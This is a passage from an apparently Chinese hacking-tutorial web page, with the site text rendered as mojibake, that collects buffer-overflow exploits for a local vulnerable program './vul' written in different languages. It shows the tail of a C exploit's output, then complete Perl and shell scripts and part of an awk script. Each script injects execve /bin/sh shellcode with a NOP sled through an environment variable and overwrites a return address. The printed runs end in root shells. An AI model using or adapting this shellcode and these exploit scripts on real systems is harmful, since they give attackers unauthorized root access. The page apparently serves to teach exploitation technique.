| ÍøÕ¾Ê×Ò³ | Ó²¼þάÐÞ | Ó¦ÓÃѧԺ | ÍøÂç×齨 | ÍøÕ¾ÖÆ×÷ | ²ËÄñºÚ¿Í | ±à³ÌÖ®µÀ | ÊýÂë´óÈ« | ÓéÀÖÐÝÏР| Èí¼þÏÂÔØ | ÔÚÏßÊÓÆµ | ÇëÄúÁôÑÔ | ¼¼ÊõÂÛ̳ | 
ר Ìâ À¸ Ä¿
×î РÈÈ ÃÅ
×î ÐÂ ÍÆ ¼ö
Ïà ¹Ø ÎÄ ÕÂ
  • ÓÃCÓïÑÔÇáËɱàдQQ¹Ò»úÍõ

  • ÈçºÎÀûÓ÷ÓÉÆ÷×öµ½·ÀÖ¹DoSºé¡­

  • ˳ÌÙÃþ¹Ï ÀûÓÃIISÈÕÖ¾×·²éÍø¡­

  • ÈÃľÂí²»ÔÚÐË·ç×÷ÀË£º½âÎöľ¡­

  • ×Ô¼º¶¯ÊÖÇå³ýµçÄÔÖеÄľÂí³Ì¡­

  • ±à³ÌÍ»ÆÆTCP/IP¹ýÂË·À»ðǽ½ø¡­

  • ºÚ¿ÍÀûÓÃRMÔÚIEÉÏÇ¿Ðдò¿ª±¾¡­

  • ÀûÓÃIPµØÖ·ÆÛÆ­Í»ÆÆ·À»ðǽ

  • ºÚ¿ÍÈçºÎÀûÓÃMs05002Òç³öÕÒ¡°¡­

  • Ò»´ÎÒâÍâµÄÈëÇÖ¾­Àú-ºÚ±ù·À»ð¡­

  • Q
    ÄúÏÖÔÚµÄλÖ㺠ÎÒÊÇITÈË >> ²ËÄñºÚ¿Í >> ºÚ¿Í¹¥·À >> ÎÄÕÂÕýÎÄ
    Òç³öÀûÓóÌÐòºÍ±à³ÌÓïÑÔ´óÔÓ»â    ÈÈ     
    Òç³öÀûÓóÌÐòºÍ±à³ÌÓïÑÔ´óÔÓ»â
    ×÷ÕߣºÍøÂç ÎÄÕÂÀ´Ô´£º×ª×ÔºÚ¿Í»ùµØ µã»÷Êý£º ¸üÐÂʱ¼ä£º2005-8-12
    [ ×ÖÌ壺ËõС Õý³£ ·Å´ó | Ë«»÷×Ô¶¯¹öÆÁ ]
    ÇëÑ¡ÔñºÏÊʵÄ×ÖÌåÑÕÉ«£º

    }
    [cloud@test]$ gcc ex.c -o ex
    [cloud@test]$ ./ex
    buff : Aèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è??
    èóÿ¿è??
    buff : AAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?
    ¿è?¿è??
    buff : AAAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?
    ÿ¿è?¿è??
    buff : AAAAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è
    ?¿è?¿è??
    sh-2.05b# id
    uid=0(root) gid=503(test) groups=503(test)
    sh-2.05b# exit
    exit

     

    <Èý> perlÓïÑÔ°æ±¾ÀûÓóÌÐòex.pl

    [cloud@test]$ cat ex.pl

    #!/usr/bin/perl
    # Demo for exploit bof of "./vul"
    # Write by watercloud @ xfocus.org

    #$ENV_LEN=`env |wc -c`
    $SHELL="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
    $ENV{KK}= "\x90"x 3096 . $SHELL;
    for($ret=1,$ag="AA",$i=0;$i<4 && $ret; $ag="A"x $i++) {
      $ret=system "./vul",$ag. "\xff\xbf\xe8\xf3"x20;  #ADDR:0xbffff3e8
    }
    #EOF
    [cloud@test]$ perl ex.pl
    buff : AAÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è
    ?¿è?¿è?
    sh-2.05b# id
    uid=0(root) gid=503(test) groups=503(test)
    sh-2.05b# exit
    exit

     

    <ËÄ> ShellÓïÑÔ°æ±¾ÀûÓóÌÐòex.sh

    [cloud@test]$ cat ex.sh
    #/bin/bash
    # Demo for exploit bof of "./vul"
    # Write by watercloud @ xfocus.org

    #ENV_LEN=`env |wc -c|tr -d ' '`
    SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
    AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096
    for((i=0;i<20;i++));do AD=$AD"\xff\xbf\xe8\xf3";done #ADDR:0xbffff3e8
    export AGSHELL=$AG`echo -e $SH`

    for((i=0;i<4;i++)) ;do
      AA=$AA"A"
      if  ./vul $AA`echo -e $AD`
      then break
      fi
    done
    #EOF
    [cloud@test]$ chmod a+x ex.sh
    [cloud@test]$ ./ex.sh
    buff : Aÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?
    ÿ¿è?¿è?
    ./ex.sh: line 16:  5287 ¶Î´íÎó                  ./vul $AA`echo -e $AD`
    buff : AAÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è
    ?¿è?¿è?
    sh-2.05b# id
    uid=0(root) gid=503(test) groups=503(test)
    sh-2.05b# exit
    exit

     

    <Îå> awkÓïÑÔ°æ±¾ÀûÓóÌÐòex.awk

    [cloud@test]$ cat ex.awk
    # Demo for exploit bof of "./vul"
    # Write by watercloud @ xfocus.org

    BEGIN{
            SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
            AG="AA";
            for ( i=0;i<10;i++)
            {
                    AG=AG""AG;
            }
            AG=AG""AG""AG #3096
            for(i=0;i<20;i++)
            {
                    AD=AD"\xe8\xf3\xff\xbf"; #ADDR:0xbffff3e8
            }

    ÉÏÒ»Ò³  [1] [2] [3] [4] ÏÂÒ»Ò³  

    ÎÄÕ¼Èë£ºÐ¡ÇØ    ÔðÈα༭£ºÐ¡ÇØ 
  • ÉÏһƪÎÄÕ£º

  • ÏÂһƪÎÄÕ£º
  • ¡¾·¢±íÆÀÂÛ¡¿¡¾¼ÓÈëÊղء¿¡¾¸æËߺÃÓÑ¡¿¡¾´òÓ¡´ËÎÄ¡¿¡¾¹Ø±Õ´°¿Ú¡¿
    ÍøÓÑÆÀÂÛ£º£¨Ö»ÏÔʾ×îÐÂ10Ìõ¡£ÆÀÂÛÄÚÈÝÖ»´ú±íÍøÓѹ۵㣬Óë±¾Õ¾Á¢³¡Î޹أ¡£©
    | ÉèΪÊ×Ò³ | ¼ÓÈëÊÕ²Ø | ÁªÏµÕ¾³¤ | ¹ØÓÚÎÒÃÇ | ÓÑÇéÁ´½Ó | °æÈ¨ÉêÃ÷ |